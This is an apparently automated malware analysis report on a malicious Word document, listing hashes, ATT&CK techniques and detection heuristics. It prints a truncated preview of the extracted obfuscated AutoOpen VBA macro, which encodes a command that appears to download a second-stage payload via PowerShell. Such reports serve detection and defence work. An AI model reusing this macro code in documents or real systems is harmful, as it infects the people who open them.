Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c344293212b1de4…

MALICIOUS

Office (OLE)

Size: 119.5 KB
Created: 2018-02-05 18:26:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 13aaa5c6814602b7ed379812f63c86b0
SHA-1: adbcb557eb4d30e20e9856080dd8755e1404da7d
SHA-256: 7c344293212b1de4798beb0cf70c9bec493460d5befba2eef1ce26a83c04ad2f
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro executes a function that uses Shell() to run code, likely to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing lure designed to drop additional malware.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37627 bytes
SHA-256: 0bed5e901a473bd3beb75e0930f8ac037988cd3be02ff5e999311a15d588dfc3

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KHIjzMczvksc"
Sub AutoOpen()
On Error Resume Next
cwwuLiOhR = vnBfMQGUVDnj + CDate(5483819) / 4358302 / 6123529 - 5418213 - Fix(104198)
VkACMFkLl = aRvtXIijc + CDate(8019705) / 6258401 / 1752303 - 219881 - Fix(1150920)
NLhiwTcOi = szQijiQUbBfD + CDate(4832008) / 2029621 / 3092369 - 4748184 - Fix(9523104)
qDmTMiupA = CPRnMiNAZr + CDate(9287637) / 9464213 / 8830932 - 4772413 - Fix(2383937)
Application.Run "GzWzuiovz", tfcwtDpYLtc
hzaKmXSXW = KwOfOVtiKOEJ + CDate(2837640) / 3817523 / 3910891 - 2249253 - Fix(1865268)
qhBtJNHij = iNAjrvBBmw + CDate(4097087) / 2047579 / 4141205 - 522551 - Fix(2784952)
jKHYkGqbN = qUsAiGAfBOU + CDate(1863262) / 5992653 / 2514629 - 2663417 - Fix(2607356)
ShMojLwia = AGwOomn + CDate(1496424) / 339164 / 5113768 - 1622678 - Fix(58371)
End Sub
Function tfcwtDpYLtc()
On Error Resume Next
jCCEC = ("Qdd6LnttU4VZjPwkG145P3zpmPv2D9u8K")
jEzPYcRj = zCbqVvUF + CDate(8515748) / 2722837 / 2150199 - 6457094 - Fix(554118)
HCLAV = clfqiLjCd + CDate(2300433) / 5872496 / 6076908 - 8041888 - Fix(2830291)
OLQZstml = Mid(jCCEC, 18, 3)
AFIqizs = ("dA6XQlz5B6 ,143 , 40,151, 156 ,40, 44, 101,104,103,130 6N")
VVCJiJ = QuRazzbwYPMpF + CDate(1186680) / 2425490 / 6889792 - 6332624 - Fix(2610644)
HAuMMkhuzNX = VRluOZCq + CDate(2521343) / 2696061 / 9366493 - 2681374 - Fix(8118415)
lkaPIIczDS = Mid(AFIqizs, 10, 46)
UtsaTWhJWi = ("wH472 , 57 ,57, 167 , 167 , 167 ,56 ,164,144 , 152 ,wHSYODpI8")
CARAka = hVbiADBwIOic + CDate(309342) / 4226864 / 92206 - 1661647 - Fix(1460819)
rWCGjo = sZOfOSTSI + CDate(9409232) / 6265448 / 5257494 - 1156853 - Fix(1852446)
adQPBITtvi = Mid(UtsaTWhJWi, 4, 49)
BCcrODSjd = ("ihQM6NLu4SNODDlVjjsVo8PCG3Hw8z45 , 156 , 164, 73 ,Xi")
pIGScSkU = aVCGJKiu + CDate(813305) / 3043618 / 6434562 - 1615196 - Fix(4844939)
OGSnVN = YNjmnRFTMMX + CDate(215656) / 5771934 / 8516215 - 4813356 - Fix(4098821)
GopVjzf = Mid(BCcrODSjd, 31, 20)
oKzmXB = ("nbkkhj450, 164 , 164 ,160,72,57, 57,61,60,60 ,145, 166 ,145 ,162IMKP8wHEOallV8l6Z12sD")
AdYvCdzACjS = rKCWvaUbGGIp + CDate(6719475) / 1515651 / 6254195 - 8028586 - Fix(4169531)
jfwnArBf = wNubJQHSZdBM + CDate(3523480) / 5081143 / 5208430 - 7665229 - Fix(1807855)
ZiIzI = Mid(oKzmXB, 8, 57)
tMkRcEbVYBN = ("GnEu6Dum [sTring]::jOIN( '', ( ( 44, 156 ,163 ,141 , 144 ,141 ,163 ,144,40,75, 40 , 46,50 ,47, 156, 47, 53 ,47 , 145,47, 53 , 47 ,167 ,55 ,157,142 TXYi")
vsGRHzCTO = pXoQBmPcA + CDate(8146910) / 4896317 / 8875404 - 7680922 - Fix(6588175)
IcRUEip = vwMzSIENI + CDate(6804528) / 8678553 / 3216182 - 8211632 - Fix(7586512)
ulKrWjkv = Mid(tMkRcEbVYBN, 9, 139)
SbTwSI = ("f,152 ,145,143 ,47, 53, 47, 164 ,47 , 51 ,40 ,162 , 141 ,156, 144 , 157,155, 73,44, 131,131 ,125 , 40 , 75 , 40 , 56, 509DmaIwWDdh6")
TZjsvYjzLz = cRBjGQaEJlJjhH + CDate(4094155) / 4716626 / 7950833 - 6222678 - Fix(8032509)
RFOmk = FozLvFuvfLMEvl + CDate(3269928) / 9928903 / 7933311 - 680570 - Fix(2698529)
aMSRM = Mid(SbTwSI, 2, 119)
GsROiZfE = ("BVU2SPPqw5o,47, 156 ,145 ,47 , 53,47 ,167, 47 , 53,47 ,55 ,157, 142 , 152, 145, 143 , 164 ,47,51, 40, 123, 171 , 163 ,164 ,145 , 155, 56 ,116, 145 , 164 ,56 , 127 ,145 , 142, 103 , 154 ,151 ,1pNHq6NGzS8V0r8Ow80ROsVwqSuC")
GvLdobSinv = oAWiZwYFkvqVj + CDate(7270269) / 3524155 / 1058350 - 9102496 - Fix(3969478)
WqhoIRiUw = wRcujMQDBkjtdj + CDate(9866427) / 2959233 / 2524634 - 2720567 - Fix(4475121)
SLzboX = Mid(GsROiZfE, 12, 181)
vPPJKoqIdDX = ("jifZS62 , 55 ,167,141,171, 56,162, 165 , 57 , 126, 124 ,61,130 ,105 , 102 , 62, 57 , 77 , 150 , 164, 164 , 160 ,72 , 57, 57 , 167 ,167 , 167 ,56, 164 , 150 , 145 ,154, 157 , 166 , 145 uCX87v3GRmXMtDiGDFBDA11M51")
pjDuIASJKbj = VYLGmSIuXUEBN + CDate(7990014) / 6916887 / 4311043 - 999528 - Fix(8337782)
dQaqX = JHYdtiPzkh + CDate(1663852) / 4381345 / 2296341 - 4181311 - Fix(7729440)
B
... (truncated)